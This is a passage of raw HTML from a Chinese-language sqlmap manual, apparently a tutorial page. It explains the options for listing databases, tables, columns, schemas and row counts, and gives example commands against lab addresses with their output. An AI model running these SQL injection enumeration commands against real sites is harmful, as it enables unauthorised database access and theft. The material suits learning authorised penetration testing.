Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4ec5\u9002\u7528\u4e8e\u5f53\u524d\u6570\u636e\u5e93\u662f<span>Oracle<\/span><span>\u7684\u65f6\u5019\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u5217\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6240\u6709\u7684\u6570\u636e\u5e93\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u8868<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;tables,&#8211;exclude-sysdbs,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u4e00\u4e2a\u7279\u5b9a\u6570\u636e\u5e93\u7684\u6240\u6709\u8868\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u4e0d\u63d0\u4f9b<span>-D<\/span><span>\u53c2\u6570\u6765\u5217\u6307\u5b9a\u7684\u4e00\u4e2a\u6570\u636e\u5e93\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u5217\u51fa\u6570\u636e\u5e93\u6240\u6709\u5e93\u7684\u6240\u6709\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">&#8211;exclude-sysdbs<span>\u53c2\u6570\u662f\u6307\u6392\u9664\u4e86\u6240\u6709\u7684\u7cfb\u7edf\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9700\u8981\u6ce8\u610f\u7684\u662f\u5728<span>Oracle<\/span><span>\u4e2d\u4f60\u9700\u8981\u63d0\u4f9b\u7684\u662f<\/span><span>TABLESPACE_NAME<\/span><span>\u800c\u4e0d\u662f\u6570\u636e\u5e93\u540d\u79f0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E4%B8%AD%E7%9A%84%E5%AD%97%E6%AE%B5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;columns,-C,-T,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6307\u5b9a\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5\uff0c\u540c\u65f6\u4e5f\u4f1a\u5217\u51fa\u5b57\u6bb5\u7684\u6570\u636e\u7c7b\u578b\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u6ca1\u6709\u4f7f\u7528<span>-D<\/span><span>\u53c2\u6570\u6307\u5b9a\u6570\u636e\u5e93\u65f6\uff0c\u9ed8\u8ba4\u4f1a\u4f7f\u7528\u5f53\u524d\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>SQLite<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/sqlite\/get_int.php?id=1&#8221;&nbsp;&#8211;columns&nbsp;-D&nbsp;testdb&nbsp;-T&nbsp;users&nbsp;-C&nbsp;name<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;SQLite_masterdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;id&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;INTEGER&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;name&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;TEXT&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;surname&nbsp;|&nbsp;TEXT&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%9E%B6%E6%9E%84\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;schema,&#8211;exclude-sysdbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7528\u6237\u53ef\u4ee5\u7528\u6b64\u53c2\u6570\u83b7\u53d6\u6570\u636e\u5e93\u7684\u67b6\u6784\uff0c\u5305\u542b\u6240\u6709\u7684\u6570\u636e\u5e93\uff0c\u8868\u548c\u5b57\u6bb5\uff0c\u4ee5\u53ca\u5404\u81ea\u7684\u7c7b\u578b\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u52a0\u4e0a<span>&#8211;exclude-sysdbs<\/span><span>\u53c2\u6570\uff0c\u5c06\u4e0d\u4f1a\u83b7\u53d6\u6570\u636e\u5e93\u81ea\u5e26\u7684\u7cfb\u7edf\u5e93\u5185\u5bb9\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">MySQL<span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.48.130\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;schema&nbsp;&#8211;batch&nbsp;&#8211;exclude-sysdbs<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;accounts<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;mysignature&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;username&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;blogs_table<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;date&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;datetime&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;blogger_name&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;comment&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;hitlog<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[6&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;date&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;datetime&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;browser&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;hostname&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;ip&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;referer&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">|&nbsp;id&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;name&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;varchar(500)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;surname&nbsp;|&nbsp;varchar(1000)&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E8%A1%A8%E4%B8%AD%E6%95%B0%E6%8D%AE%E4%B8%AA%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;count<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u6709\u65f6\u5019\u7528\u6237\u53ea\u60f3\u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\u4e2a\u6570\u800c\u4e0d\u662f\u5177\u4f53\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1&#8221;&nbsp;&#8211;count&nbsp;-D&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Table&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Entries&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;dbo.users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;dbo.users_blob&nbsp;|&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E6%95%B4%E4%B8%AA%E8%A1%A8%E7%9A%84%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--dump,-C,-T,-D,--start,--stop,--first,--last<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 